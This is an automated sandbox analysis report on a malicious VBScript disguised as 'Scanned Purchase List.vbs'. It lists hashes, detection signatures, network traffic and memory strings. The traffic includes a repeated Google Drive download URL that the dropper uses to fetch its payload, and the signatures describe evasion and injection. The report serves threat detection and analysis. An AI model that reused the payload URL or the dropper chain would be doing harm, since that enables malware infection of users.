Windows Analysis Report
Scanned Purchase List.vbs

Overview

General Information

Sample name: Scanned Purchase List.vbs
Analysis ID: 1523158
MD5: 15b5b581555ff3e269c973f152f71cf6
SHA1: b192825801c73167464fe4fdc71925b296379d24
SHA256: 24bddce898f1e7b3feb484483fe5bad7a29b95cdabef060ca7872d3ec3c2597f
Tags: vbsuser-abuse_ch
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection

barindex
Source: Scanned Purchase List.vbs Virustotal: Detection: 12% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 81.4% probability
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: Binary string: .pdb_ source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb, source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 142.250.185.142:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 01 Oct 2024 05:45:42 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-q8oJJG7lrmgUDLiilGDf0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AD-8ljt1RjSv6hgWhcRactfyOsekMzQoC07JjKpaABR2hR8xVe1RT2GaqfvZpggRr918ay4YGoq842yUKAServer: UploadServerSet-Cookie: NID=517=TYYrH7PW08eA_e5U2OuC4zmekvTUxL9y9Z0hSYlicR1c__kVJQs5xULdovxIj3IMXPMi_rdS8LNeC_fCziXbKGAjzcMEW4yG8zarYR9db8593BfYRuwpe5m1rfnmNFR8-YVfvaeNQ2W03vkoB6kiM4lLNwH7YtVvhCXyrPd0UQxAzsyZ3d0; expires=Wed, 02-Apr-2025 05:45:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 01 Oct 2024 05:45:48 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-_i0DtfREUVVlSIbKtp4JLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AD-8ljtljf0Ewfhqytx9iVo7nmtP2yYDqdRfk7K-KlU9Y2zyHbcMNuBPlWiupVMk9e0Ipjdkp8Lla0uERAServer: UploadServerSet-Cookie: NID=517=ayNybyF5N2eBPQYwkElV42dGDAo7dQDQxiFHFSICxvzYeUHQ8Auvb772g32F6tMuhU37CAI3kwDYH70R6YO3RPT0tciihaowI_fgJk0hB8bBGjogaqzZOxwWUoixwbKaXp4mZtGQuSZMsktz1QUq2laaEbkFMssVx1YBcZsGm_RpJq13Zw; expires=Wed, 02-Apr-2025 05:45:48 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRoot
Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTruste
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en$
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE
Source: wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?37763f6d4a
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD0EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0FC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD10D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD151F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD03BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD057A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD0D8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADCFE8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2992339914.000001ADD07A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.3009017913.000001ADDF913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000003.1718339085.000001DC5CAA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718762752.000001DC5CAC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698462624.000001DC5CCF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698486019.000001DC5CADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719163509.000001DC5CAAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CAC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCFAC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000001.00000002.2992339914.000001ADCF8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD14E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.3009017913.000001ADDFA56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD1135000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.2992339914.000001ADD181E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googPBjN
